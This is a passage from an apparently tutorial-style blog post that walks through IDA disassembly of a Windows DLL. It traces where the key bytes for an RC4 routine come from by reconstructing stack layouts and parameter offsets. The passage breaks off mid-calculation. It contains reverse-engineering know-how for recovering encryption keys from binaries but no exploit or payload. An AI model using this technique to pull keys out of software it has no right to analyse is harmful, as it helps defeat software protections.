<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;">Ok, here we go... Again! Recursive way to think: let's call "do_rc4_2" the function we are in and follow <i>p_key_bytes</i> via Cross Reference to see when it is filled.</span></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> </span></span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;"></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">1000129A</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> lea ecx, [ebp+</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">58</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">h]</span></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">1000129D</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> call get_key_object</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">100012A2</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> push eax </span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">100012A3</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> lea eax, [ebp-</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">1F4</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">h]</span></span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">100012A9</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> push eax </span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">100012AA</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> call do_rc4_2</span></span></div>
</span></div>
</span><br />
<br />
<br />
"p_key_bytes" is the second parameter of "do_rc4_2" and to investigate its value we have to follow <i>eax</i>, that is... the return value of the "get_key_object" function we have already described. It reads an object from the address contained in <i>ecx</i>... that is... the one contained in <i>ebp+58h</i>! Really, really weird!<br />
Why <i>ebp+58h</i>? Are there so many parameters on the stack?<br />
<br />
In order to understand the situation properly, we have to go at the beginning of the function "do_rc4_2":<br />
<span class="Apple-style-span" style="font-family: Menlo; font-size: 11px;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></span><br />
<span class="Apple-style-span" style="font-family: Menlo; font-size: 11px;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">10001230</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> push ebp</span></span></span><br />
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">10001231</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> sub esp, </span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">48</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">h</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">10001234</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> mov eax, offset sub_1006A3CF</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">10001239</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> call __EH_prolog</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;">To skip some boring calculations, let's just say that "__EG_prolog" sets the value of <i>ebp</i> to <i>esp-4</i>. So, a</span></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;">fter the execution of these instructions, the stack will look like this:</span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"> </span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">... [prolog][48h bytes][ebp][ret_addr][param_1][param_2] ...</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;">So:</span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"> </span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">prolog + 48h + ebp + ret_addr + param_1 = 4h + 48h + 4h +4h +4h = 58h</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"> </span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"> </span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;">It sounds good! It means that the code points to <i>param_2</i>.</span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"> </span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;">Once again... we call "go" the function we are in, and look for the "go" second parameter via Cross Reference.</span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"> </span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">10003254</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> sub esp, </span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">14</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">h</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">10003257</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> mov eax, esp</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">10003259</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> mov [ebp+</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">78</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">h], esp</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">1000325C</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> push eax</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">1000325D</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> mov ebx, [ebp+</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">68</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">h]</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">10003260</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> call do_newcopy_addref</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">10003265</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> mov byte ptr [ebp-</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">4</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">], </span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">2</span></span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">10003269</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> push dword_10091C08</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">1000326F</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> mov byte ptr [ebp-</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">4</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">], </span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">1</span></span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">10003273</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> call go </span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> </span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> </span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">And here comes the problem... we are looking for the second parameter, but there's only one push! Don't panic.</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Let's give a look at the code: first it allocates memory on the stack, using the sub esp, 14h instruction, and then it calls the "do_newcopy_addref" function that copies something from the value at the address in <i>ebp+68h</i> to <i>esp-14h</i> (once again, <i>ebp+68h</i> is passed via register!).</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">So, we have to re-figure out what the stack looks like:</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">... [prolog][48h bytes][ebp][ret_addr][param_1][14h bytes object] ...</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;">Basically, <i>param_2 </i>is a <i>14h bytes object</i></span></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;">.</span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;">This is unusual, as normally the code would have passed a pointer to the object instead of the object itself. This also makes the code more difficult to analyze because, in this way, IDA cannot recognize the parameter anymore.</span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"> </span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;">We are almost done: let's focus on <i>ebp+68h</i> and try to track it back!</span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">1000323E</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> push dword ptr [ebp+</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">78</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">h]</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">10003241</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> lea eax, [ebp+</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">68</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">h] </span></span></div>
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">10003244</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> push eax</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">10003245</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> call sub_1000346A </span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;">The reasoning is always the same: we see a function with two parameters, one of which is <i>ebp+68h</i>; so, we can suppose that the other one, that is <i>ebp+78h</i>, points to the bytes of the key and the function instantiates an object by making a copy from the key itself.</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Now, we have to follow <i>ebp+78h</i>. It reminds us of the weird parameter <i>ebp+58h</i> we saw before... So, again, we go at the beginning of the function and notice:</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"></span></span></div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">100031FA</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> push ebp</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">100031FB</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> sub esp, </span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">6C</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">h</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">100031FE</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> mov eax, offset loc_1006ACBC</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">10003203</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> call __EH_prolog</span></span></div>
<div>
<br /></div>
</span><br />
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">This time the stack will look like this:</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">... [prolog][6Ch bytes][ebp][ret_addr][param_1][param_2] ...</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">and</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">prolog + 6Ch + ebp + retaddr = 4h + 6Ch + 4h + 4h = 78h</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
